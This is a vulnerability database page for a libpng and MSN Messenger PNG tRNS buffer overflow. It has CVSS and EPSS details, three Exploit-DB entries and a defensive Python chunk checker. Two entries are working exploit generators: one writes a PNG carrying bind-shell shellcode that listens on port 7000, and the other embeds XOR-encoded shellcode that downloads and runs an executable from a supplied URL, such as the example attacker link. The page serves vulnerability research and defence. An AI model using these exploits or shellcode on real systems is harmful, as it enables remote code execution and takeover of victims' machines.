Metrics
Metrics | Score | Severity | CVSS Vector | Source
V2 | 10 | | AV:N/AC:L/Au:N/C:C/I:C/A:C | nvd@nist.gov
EPSS
EPSS is a scoring model that predicts the probability that a vulnerability will be exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVEs by their EPSS score. For example, a CVE in the 95th percentile by EPSS score is more likely to be exploited than 95% of all other CVEs. The percentile therefore compares the EPSS score of one CVE against those of other CVEs.
Exploit Information
Exploit Database EDB-ID: 393
Publication date: 2004-08-12 22:00 +00:00
Author: anonymous
EDB Verified: Yes
```c
#include <stdio.h>
#include <stdlib.h>
#include "png.h"

/* The png_jmpbuf() macro, used in error handling, became available in
 * libpng version 1.0.6. If you want to be able to run your code with older
 * versions of libpng, you must define the macro yourself (but only if it
 * is not already defined by libpng!).
 */
#ifndef png_jmpbuf
#define png_jmpbuf(png_ptr) ((png_ptr)->jmpbuf)
#endif

#define ERROR 1
#define OK 0

/* Minimal libpng 1.2.x reader used as a test harness: it simply opens the
 * file and lets png_read_png() parse every chunk. png_infopp_NULL and
 * png_voidp_NULL are the null-pointer macros of that libpng generation. */
int read_png(char *file_name) /* We need to open the file */
{
    png_structp png_ptr;
    png_infop info_ptr;
    unsigned int sig_read = 0;
    png_uint_32 width, height;
    int bit_depth, color_type, interlace_type;
    FILE *fp;

    if ((fp = fopen(file_name, "rb")) == NULL)
        return (ERROR);

    /* Create and initialize the png_struct with the desired error handler
     * functions. If you want to use the default stderr and longjump method,
     * you can supply NULL for the last three parameters. We also supply the
     * compiler header file version, so that we know if the application
     * was compiled with a compatible version of the library. REQUIRED
     */
    png_ptr = png_create_read_struct(PNG_LIBPNG_VER_STRING,
                                     NULL, NULL, NULL);
    if (png_ptr == NULL)
    {
        fclose(fp);
        return (ERROR);
    }

    /* Allocate/initialize the memory for image information. REQUIRED. */
    info_ptr = png_create_info_struct(png_ptr);
    if (info_ptr == NULL)
    {
        fclose(fp);
        png_destroy_read_struct(&png_ptr, png_infopp_NULL, png_infopp_NULL);
        return (ERROR);
    }

    /* Set error handling if you are using the setjmp/longjmp method (this is
     * the normal method of doing things with libpng). REQUIRED unless you
     * set up your own error handlers in the png_create_read_struct() earlier.
     */
    if (setjmp(png_jmpbuf(png_ptr)))
    {
        /* Free all of the memory associated with the png_ptr and info_ptr */
        png_destroy_read_struct(&png_ptr, &info_ptr, png_infopp_NULL);
        fclose(fp);
        /* If we get here, we had a problem reading the file */
        return (ERROR);
    }

    /* Set up the input control if you are using standard C streams */
    png_init_io(png_ptr, fp);

    /* If we have already read some of the signature */
    png_set_sig_bytes(png_ptr, sig_read);

    /*
     * If you have enough memory to read in the entire image at once,
     * and you need to specify only transforms that can be controlled
     * with one of the PNG_TRANSFORM_* bits (this presently excludes
     * dithering, filling, setting background, and doing gamma
     * adjustment), then you can read the entire image (including
     * pixels) into the info structure with this call:
     */
    png_read_png(png_ptr, info_ptr, PNG_TRANSFORM_IDENTITY, png_voidp_NULL);

    /* clean up after the read, and free any memory allocated - REQUIRED */
    png_destroy_read_struct(&png_ptr, &info_ptr, png_infopp_NULL);

    /* close the file */
    fclose(fp);

    /* that's it */
    return (OK);
}

int main(int argc, char **argv)
{
    if (argc < 2) {
        fprintf(stderr, "Usage: %s <png>\n", argv[0]);
        return EXIT_FAILURE;
    }
    if (read_png(argv[1]) != OK) {
        fprintf(stderr, "Error reading png\n");
        return EXIT_FAILURE;
    }
    return 0;
}

// milw0rm.com [2004-08-13]
```
Exploit Database EDB-ID: 389
Publication date: 2004-08-10 22:00 +00:00
Author: infamous41md
EDB Verified: Yes
```c
/*
 * exploit for libpng, tested on version 1.2.5
 * infamous42md AT hotpop DOT com
 *
 * shouts to mitakeet (hope u patched :D)
 *
 * [n00b_at_localho.outernet] ./po
 * Usage: ./po < retaddr > [ outfile ]
 *
 * -all u need to give is retaddr, the default file it creates is controlled by
 * the define below, or u can pass a diff outfile name on the command line.
 * the output is not an entire png, just enough to trigger the bug. i've also
 * included a simple program to test with.
 *
 * [n00b_at_localho.outernet] netstat -ant | grep 7000
 * [n00b_at_localho.outernet] gcc pnouch.c -Wall -o po
 * [n00b_at_localho.outernet] gcc pngslap.c -o slapped -lz -lm lib/libpng12.so
 * [n00b_at_localho.outernet] ./po 0xbffff8b0
 * [n00b_at_localho.outernet] ./slapped britnay_spares_pr0n.png
 * libpng warning: Missing PLTE before tRNS
 * libpng warning: tRNS: CRC error
 * [n00b_at_localho.outernet] netstat -ant | grep 7000
 * tcp 0 0 0.0.0.0:7000 0.0.0.0:* LISTEN
 *
 */
#include <stdio.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <fcntl.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>

#define OUTFILE "britnay_spares_pr0n.png"
#define BS 0x1000
#define ALIGN 0
#define NOP 0x90
#define NNOPS 100
#define RETADDR_BYTES 300
#define die(x) do{ perror((x)); exit(EXIT_FAILURE);}while(0)

/* identifies a file as a png */
#define MAJIC_LEN sizeof(png_majic)
u_char png_majic[] = { 0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a };

/*
 * appears first, gives len/width/etc. important part is setting the color type
 * to 0x03, byte 10 of the IHDR data. that signfies that a PALLETE chunk should
 * be present. but we dont have one, and that is how the len check is bypassed.
 * the chunk len includes only the data, not the len field itself, or the id, or
 * the crc at the end. these bytes are stolen from the advisory.
 */
#define IHDR_LEN sizeof(png_ihdr)
u_char png_ihdr[] = { 0x00, 0x00, 0x00, 0x0d, /* chunk len */
                      0x49, 0x48, 0x44, 0x52, /* chunk id */
                      0x00, 0x00, 0x00, 0x5b, 0x00, 0x00, 0x00, 0x45,
                      0x08, 0x03, 0x00, 0x00, 0x01,
                      0x65, 0x33, 0x5a, 0xd6 /* chunk crc */
                    };

/*
 * this is the tRNS type chunk, this is the evil chunk that actually contains
 * the shellcode.
 */
#define TRNS_LEN sizeof(png_trns_len_id)
u_char png_trns_len_id[] = { 0x00, 0x00, 0x00, 0x00, /* chunk len filled in*/
                             0x74, 0x52, 0x4e, 0x53 /* chunk id */
                             /* begin chunk data */
                             /* retaddr, NOPS, shellcode, CRC will follow */
                           };

/* call them shell code */
#define SHELL_LEN strlen(sc)
char sc[] =
"\x31\xc0\x50\x50\x66\xc7\x44\x24\x02\x1b\x58\xc6\x04\x24\x02\x89\xe6"
"\xb0\x02\xcd\x80\x85\xc0\x74\x08\x31\xc0\x31\xdb\xb0\x01\xcd\x80\x50"
"\x6a\x01\x6a\x02\x89\xe1\x31\xdb\xb0\x66\xb3\x01\xcd\x80\x89\xc5\x6a"
"\x10\x56\x50\x89\xe1\xb0\x66\xb3\x02\xcd\x80\x6a\x01\x55\x89\xe1\x31"
"\xc0\x31\xdb\xb0\x66\xb3\x04\xcd\x80\x31\xc0\x50\x50\x55\x89\xe1\xb0"
"\x66\xb3\x05\xcd\x80\x89\xc5\x31\xc0\x89\xeb\x31\xc9\xb0\x3f\xcd\x80"
"\x41\x80\xf9\x03\x7c\xf6\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62"
"\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

int main(int argc, char **argv)
{
    int fd = 0, len = 0, x = 0, chunk_len = 0;
    char *filename = OUTFILE;
    u_char buf[BS];
    u_long retaddr = 0;

    if(argc < 2){
        fprintf(stderr, "Usage: %s < retaddr > [ outfile ]\n", argv[0]);
        return EXIT_FAILURE;
    }
    if(argc > 2)
        filename = argv[2];

    memset(buf, 0, BS);
    sscanf(argv[1], "%lx", &retaddr);

    /* create buffer:
     * png id - png ihdr - png trns - retaddr - NOPS - shell - crc(don't need)
     */
    memcpy(buf, png_majic, MAJIC_LEN);
    len += MAJIC_LEN;
    memcpy(buf+len, png_ihdr, IHDR_LEN);
    len += IHDR_LEN;
    memcpy(buf+len, png_trns_len_id, TRNS_LEN);
    len += TRNS_LEN;

    for(x = 0; x < RETADDR_BYTES-3; x += 4)
        memcpy(buf+len+x+ALIGN, &retaddr, sizeof(retaddr));
    x += ALIGN;
    len += x;

    memset(buf+len, NOP, NNOPS);
    len += NNOPS;
    memcpy(buf+len, sc, SHELL_LEN);
    len += SHELL_LEN;

    /* length of chunk data; the u_long stores assume a 32-bit build (4-byte u_long) */
    chunk_len = x + NNOPS + SHELL_LEN;
    *(u_long *)(buf+MAJIC_LEN+IHDR_LEN) = htonl(chunk_len);

    /* include the crc (left as zero bytes, hence the CRC warning from libpng) */
    len += sizeof(u_long);

    /* create the file */
    if( (fd = open(filename, O_WRONLY|O_CREAT|O_EXCL, 0666)) < 0)
        die("open");
    if(write(fd, buf, len) != len)
        die("write");
    close(fd);

    return 0;
}

// milw0rm.com [2004-08-11]
```
Exploit Database EDB-ID: 25094
Publication date: 2005-02-07 23:00 +00:00
Author: ATmaCA
EDB Verified: Yes
// source: https://www.securityfocus.com/bid/12506/info
A remotely exploitable buffer overflow exists in MSN Messenger and Windows Messenger. This vulnerability is related to parsing of Portable Network Graphics (PNG) image header data. Successful exploitation will result in execution of arbitrary code in the context of the vulnerable client user.
Attack vectors and mitigations may differ for MSN Messenger and Windows Messenger. For Windows Messenger, the attacker must spoof the .NET Messenger service and the client must be configured to receive .NET alerts.
However, MSN Messenger may be exploited through various methods in a client-to-client attack. Possible attack vectors for this vulnerability in MSN Messenger include:
User display pictures
Custom icons that are displayed inline in instant messages
Thumbnails of transferred images
Background images
Since this issue may be exploited in a client-to-client attack for MSN Messenger, it is a likely candidate for development of a worm.
```cpp
/*
 *
 * MSN Messenger PNG Image Buffer Overflow Download Shellcoded Exploit
 * Bug discovered by Core Security Technologies (www.coresecurity.com)
 * Exploit coded By ATmaCA
 * Copyright (c) 2002-2005 AtmacaSoft Inc. All Rights Reserved.
 * Web: http://www.atmacasoft.com
 * E-Mail: atmaca@icqmail.com
 * Credit to kozan and delikon
 * Usage:exploit <OutputPath> <Url>
 *
 */
/*
 *
 * Tested with MSN Messenger 6.2.0137
 * This vulnerability can be exploited on Windows 2000 (all service packs)
 * and Windows XP (all service packs) that run vulnerable
 * clients of MSN Messenger.
 *
 */
/*
 *
 * After creating vuln png image, open
 * MSN Messenger and select it as your display picture in
 * "Tools->Change Display Picture".
 *
 */
#include <stdio.h>
#include <stdlib.h>
#include <conio.h>
#include <string.h>
#ifdef __BORLANDC__
#include <mem.h>
#endif

#define NOP 0x90

/* PNG signature, a 64x64 IHDR with colour type 3 (palette) and a tRNS chunk
 * whose declared length is 0x1B9 = 441 bytes, without any PLTE chunk */
char png_header[] =
"\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\x49\x48\x44\x52"
"\x00\x00\x00\x40\x00\x00\x00\x40\x08\x03\x00\x00\x00\x9D\xB7\x81"
"\xEC\x00\x00\x01\xB9\x74\x52\x4E\x53";

char pngeof[] = "\x90\x90\x90\x59\xE8\x47\xFE\xFF\xFF";

/* Generic win32 http download shellcode
   xored with 0x1d by delikon (http://delikon.de/) */
char shellcode[] = "\xEB"
"\x10\x58\x31\xC9\x66\x81\xE9\x22\xFF\x80\x30\x1D\x40\xE2\xFA\xEB\x05\xE8\xEB\xFF"
"\xFF\xFF\xF4\xD1\x1D\x1D\x1D\x42\xF5\x4B\x1D\x1D\x1D\x94\xDE\x4D\x75\x93\x53\x13"
"\xF1\xF5\x7D\x1D\x1D\x1D\x2C\xD4\x7B\xA4\x72\x73\x4C\x75\x68\x6F\x71\x70\x49\xE2"
"\xCD\x4D\x75\x2B\x07\x32\x6D\xF5\x5B\x1D\x1D\x1D\x2C\xD4\x4C\x4C\x90\x2A\x4B\x90"
"\x6A\x15\x4B\x4C\xE2\xCD\x4E\x75\x85\xE3\x97\x13\xF5\x30\x1D\x1D\x1D\x4C\x4A\xE2"
"\xCD\x2C\xD4\x54\xFF\xE3\x4E\x75\x63\xC5\xFF\x6E\xF5\x04\x1D\x1D\x1D\xE2\xCD\x48"
"\x4B\x79\xBC\x2D\x1D\x1D\x1D\x96\x5D\x11\x96\x6D\x01\xB0\x96\x75\x15\x94\xF5\x43"
"\x40\xDE\x4E\x48\x4B\x4A\x96\x71\x39\x05\x96\x58\x21\x96\x49\x18\x65\x1C\xF7\x96"
"\x57\x05\x96\x47\x3D\x1C\xF6\xFE\x28\x54\x96\x29\x96\x1C\xF3\x2C\xE2\xE1\x2C\xDD"
"\xB1\x25\xFD\x69\x1A\xDC\xD2\x10\x1C\xDA\xF6\xEF\x26\x61\x39\x09\x68\xFC\x96\x47"
"\x39\x1C\xF6\x7B\x96\x11\x56\x96\x47\x01\x1C\xF6\x96\x19\x96\x1C\xF5\xF4\x1F\x1D"
"\x1D\x1D\x2C\xDD\x94\xF7\x42\x43\x40\x46\xDE\xF5\x32\xE2\xE2\xE2\x70\x75\x75\x33"
"\x78\x65\x78\x1D";

FILE *di;
int i = 0;
short int weblength;
char *web;
char *pointer = NULL;
char *newshellcode;

/* xor cryptor: encodes the URL in place with the same 0x1d key the shellcode decodes with.
   ('xor' is a reserved alternative token in C++, so the key variable is named 'key'.) */
char *Sifrele(char *Name1)
{
    char *Name=Name1;
    char key=0x1d;
    int Size=strlen(Name);
    for(i=0;i<Size;i++)
        Name[i]=Name[i]^key;
    return Name;
}

int main(int argc, char *argv[])
{
    if (argc < 3)
    {
        printf("MSN Messenger PNG Image Buffer Overflow Download Shellcoded Exploit\n");
        printf("Bug discovered by Core Security Technologies (www.coresecurity.com)\n");
        printf("Exploit coded By ATmaCA\n");
        printf("Copyright (c) 2002-2005 AtmacaSoft Inc. All Rights Reserved.\n");
        printf("Web: http://www.atmacasoft.com\n");
        printf("E-Mail: atmaca@icqmail.com\n");
        printf("Credit to kozan and delikon\n\n");
        printf("\tUsage:exploit <OutputPath> <Url>\n");
        printf("\tExample:exploit vuln.png http://www.atmacasoft.com/exp/msg.exe\n");
        return 1;
    }
    web = argv[2];
    if( (di=fopen(argv[1],"wb")) == NULL )
    {
        printf("Error opening file!\n");
        return 1;
    }
    for(i=0;i<sizeof(png_header)-1;i++)
        fputc(png_header[i],di);

    /*stuff in a couple of NOPs*/
    for(i=0;i<99;i++)
        fputc(NOP,di);

    /* patch the URL length into the shellcode's decoder loop counter */
    weblength=(short int)0xff22;
    pointer=strstr(shellcode,"\x22\xff");
    weblength-=strlen(web)+1;
    memcpy(pointer,&weblength,2);

    newshellcode = new char[sizeof(shellcode)+strlen(web)+1];
    strcpy(newshellcode,shellcode);
    strcat(newshellcode,Sifrele(web));
    strcat(newshellcode,"\x1d");

    //shell code
    for(i=0;i<strlen(newshellcode);i++)
        fputc(newshellcode[i],di);
    for(i=0;i<(83-strlen(web));i++) //NOPs
        fputc(NOP,di);

    /*Overwriting the return address (EIP)*/
    /*0x005E0547 - ret */
    fputc(0x47,di);
    fputc(0x05,di);
    fputc(0x5e,di);
    fputc(0x00,di);

    for(i=0;i<sizeof(pngeof)-1;i++)
        fputc(pngeof[i],di);

    printf("Vulnerable png file %s has been generated!\n",argv[1]);
    fclose(di);
    return 0;
}
```
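Both PoCs above rely on the same malformed structure: an IHDR that declares colour type 3 (palette), no PLTE chunk, and a tRNS chunk whose declared length is far larger than any palette could be. The checker below is an added example (not code from Exploit-DB or the PoC authors) that walks a PNG's chunks and reports a tRNS chunk that is inconsistent with IHDR and PLTE, which is what a defensive pre-parser or scanner would flag before handing the file to an image library. The sample inputs are constructed here; the IHDR payload is the 13-byte one from the libpng PoC and 441 is the tRNS length declared in the MSN Messenger PoC header.

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
EXPECTED_TRNS_LEN = {0: 2, 2: 6}   # greyscale and RGB keys; palette (3) is checked separately

def make_chunk(ctype, payload):
    """Well-formed chunk: big-endian length, type, payload, CRC-32 over type+payload."""
    crc = zlib.crc32(ctype + payload) & 0xffffffff
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)

def iter_chunks(data):
    """Yield (type, payload, crc_ok); tolerates truncated files such as the PoC output."""
    if data[:8] != PNG_SIGNATURE:
        raise ValueError("not a PNG file")
    pos = 8
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        payload = data[pos + 8:pos + 8 + length]
        crc = data[pos + 8 + length:pos + 12 + length]
        crc_ok = len(crc) == 4 and struct.unpack(">I", crc)[0] == (zlib.crc32(ctype + payload) & 0xffffffff)
        yield ctype, payload, crc_ok
        pos += 12 + length

def trns_findings(data):
    """List why a tRNS chunk is inconsistent with IHDR/PLTE; empty means it is well-formed."""
    findings, color_type, palette_entries = [], None, None
    for ctype, payload, crc_ok in iter_chunks(data):
        if ctype == b"IHDR" and len(payload) == 13:
            color_type = payload[9]          # byte 10 of the IHDR data; 3 = palette image
        elif ctype == b"PLTE":
            palette_entries = len(payload) // 3
        elif ctype == b"tRNS":
            n = len(payload)
            if color_type == 3:              # one alpha byte per palette entry, never more than 256
                if palette_entries is None:
                    findings.append("tRNS with no preceding PLTE")
                if n > 256 or (palette_entries is not None and n > palette_entries):
                    findings.append("tRNS length %d exceeds palette size" % n)
            elif color_type in EXPECTED_TRNS_LEN and n != EXPECTED_TRNS_LEN[color_type]:
                findings.append("tRNS length %d wrong for colour type %d" % (n, color_type))
            if not crc_ok:
                findings.append("tRNS CRC missing or wrong")
    return findings

# Constructed samples: IHDR from the libpng PoC (colour type 0x03); BAD_PNG mirrors the PoC layout
# (tRNS of 441 bytes, no PLTE, CRC left off), GOOD_PNG is a well-formed 2-entry palette image.
IHDR = bytes.fromhex("0000005b000000450803000001")
GOOD_PNG = (PNG_SIGNATURE + make_chunk(b"IHDR", IHDR) + make_chunk(b"PLTE", b"\x00" * 6)
            + make_chunk(b"tRNS", b"\x00\xff") + make_chunk(b"IEND", b""))
BAD_PNG = PNG_SIGNATURE + make_chunk(b"IHDR", IHDR) + struct.pack(">I", 441) + b"tRNS" + b"\x00" * 441
```

Running `trns_findings(BAD_PNG)` reports the missing PLTE, the oversized tRNS and the missing CRC, while `trns_findings(GOOD_PNG)` returns an empty list.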
Products Mentioned
Configuration 0
Greg_roelofs >> Libpng >> Version up to (including) 1.2.5
Microsoft >> Msn_messenger >> Version 6.1
Microsoft >> Msn_messenger >> Version 6.2
Microsoft >> Windows_media_player >> Version 9
Microsoft >> Windows_messenger >> Version 5.0
Configuration 0
Microsoft >> Windows_98se >> Version *
Microsoft >> Windows_me >> Version *
References